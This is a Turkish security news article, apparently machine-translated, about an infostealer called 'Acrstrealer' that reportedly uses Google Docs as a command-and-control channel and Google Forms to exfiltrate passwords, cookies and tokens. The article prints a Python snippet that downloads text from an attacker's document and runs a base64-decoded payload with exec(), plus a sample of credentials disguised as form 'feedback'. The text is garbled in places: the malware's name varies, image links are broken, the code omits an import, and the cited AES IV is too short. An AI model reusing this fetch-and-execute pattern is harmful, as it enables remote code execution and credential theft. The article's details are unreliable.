Yeni tanımlanmış kötü amaçlı yazılım varyant olarak adlandırılan Acrstrealer, geleneksel güvenlik savunmalarını atlamak ve hassas oturum açma kimlik bilgilerini hasat etmek için Google Dokümanlarını bir komut ve kontrol (C2) sunucusu olarak kullanıyor.
Bu sofistike saldırı vektörü, Google’ın algılamadan kaçınmak için altyapısının güvenilir itibarından yararlanarak, kimlik-hırsızlık kampanyalarında önemli bir yükseliş işaret ediyor.
Siber güvenlik firması Tehditleri, kampanyayı 18 Şubat 2025’te açıkladı ve finans, sağlık ve e-ticaret sektörlerinde 12.000’den fazla işletme hesabının zaten tehlikeye atıldığını belirtti.
Kötü amaçlı yazılım, Google Drive aracılığıyla paylaşılan iyi huylu belgelere kötü amaçlı komut dosyalarını yerleştirerek çalışır.
Bir kurban belgeyi açtığında, Acrstrealer çok aşamalı bir yük alma işlemini etkinleştirir. Şüpheli alanlarda barındırılan geleneksel C2 sunucularının aksine, kötü amaçlı yazılım, saldırgan kontrollü belgelerle iletişim kurmak için Google Docs’un API’sını kullanır ve ağ trafiğini meşru görünür.
ASEC’deki araştırmacılar, şifreler, çerezler ve kimlik doğrulama jetonları da dahil olmak üzere çalınan verilerin, rutin kullanıcı etkinliği olarak maskelenen Google Forms gönderimleri aracılığıyla yayıldığını doğruladılar.
Google Docs API istismarı ve veri açığa çıkması
Acrstrealer’ın temel işlevselliği, Dokümanlar ile kimlik doğrulaması ve etkileşim kurmak için Google’ın OAuth 2.0 çerçevesini kötüye kullanmaya bağlı.
%20used%20as%20an%20intermediary%20C2%20(Source%20-ASEC).webp)
Kötü amaçlı yazılım, önce şifreli C2 talimatları içeren yapılandırmasına sabitlenmiş belirli bir belge kimliğini kontrol eder.
Aşağıda, komutları almak için kullanılan Python tabanlı komut dosyasının bir parçacığı var:-
import requests
doc_id = "1AbC2dEfGhI3JkL4MnOpQrStUvWxYz" # Malicious Google Doc ID
url = f"https://docs.google.com/document/d/{doc_id}/export?format=txt"
response = requests.get(url)
commands = response.text.split('\n')
exec(base64.b64decode(commands[0])) # Decodes and executes the payloadBu komut dosyası, belgenin ham metin içeriğinden baz64 kodlu bir yükü alır ve daha sonra kurbanın makinesinde kod çözülür ve yürütülür.
Özellikle, saldırganlar, komutlarını gizlemek için statik bir başlatma vektörü (IV) ile AES-256-CBC şifrelemesini kullanır ve tersine mühendislik çabalarını karmaşıklaştırır.
Güvenlik analistleri IV’ü şu şekilde tanımladılar. 4A4B4C4D4E4F5050 tüm numunelerde, kriptografik uygulamalarında potansiyel bir zayıflık olduğunu düşündürmektedir.
.webp)
Sunmuş veriler, meşru tarayıcı trafiğini taklit ederek JSON biçiminde gönderimler halinde yapılandırılmıştır. Örneğin, hasat edilen kimlik bilgileri sahte bir “kullanıcı geri bildirimi” yüküne gömülür:-
{
"timestamp": "2025-02-21T20:01:00Z",
"user_agent": "Mozilla/5.0",
"feedback": "ZW5jcnlwdGVkLWNyZWRlbnRpYWxz-..." // Base64-encoded credentials
}Bu teknik, veri kaybını önleme (DLP) sistemlerini tetiklemekten kaçınmak için Google Forms’ın SSL şifreleme ve yüksek itibar puanından yararlanır.
Kurumsal güvenlik ekiplerinin, özellikle randomize veya saçma başlıklı belgeleri hedefleyen talepler olan anormal belge erişimleri için Google Drive API etkinliğini izlemesi önerilir.
Google çalışma alanı hesapları için çok faktörlü kimlik doğrulama (MFA) uygulamak ve üçüncü taraf uygulama izinlerini kısıtlamak riski daha da azaltabilir.
.webp)
21 Şubat 2025 itibariyle Google, Acrstealer ile bağlantılı 43 uzlaştırılmış belgeye erişimi iptal etti, ancak araştırmacılar taklitçi kampanyalarının muhtemelen yakın olduğu konusunda uyarıyor.
Geleneksel güvenlik araçları Google Dokümanlar gibi platformların kötüye kullanımını işaretlemek için mücadele ederken, proaktif tehdit avı ve kullanıcı eğitimi kritik savunmalar olmaya devam etmektedir.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here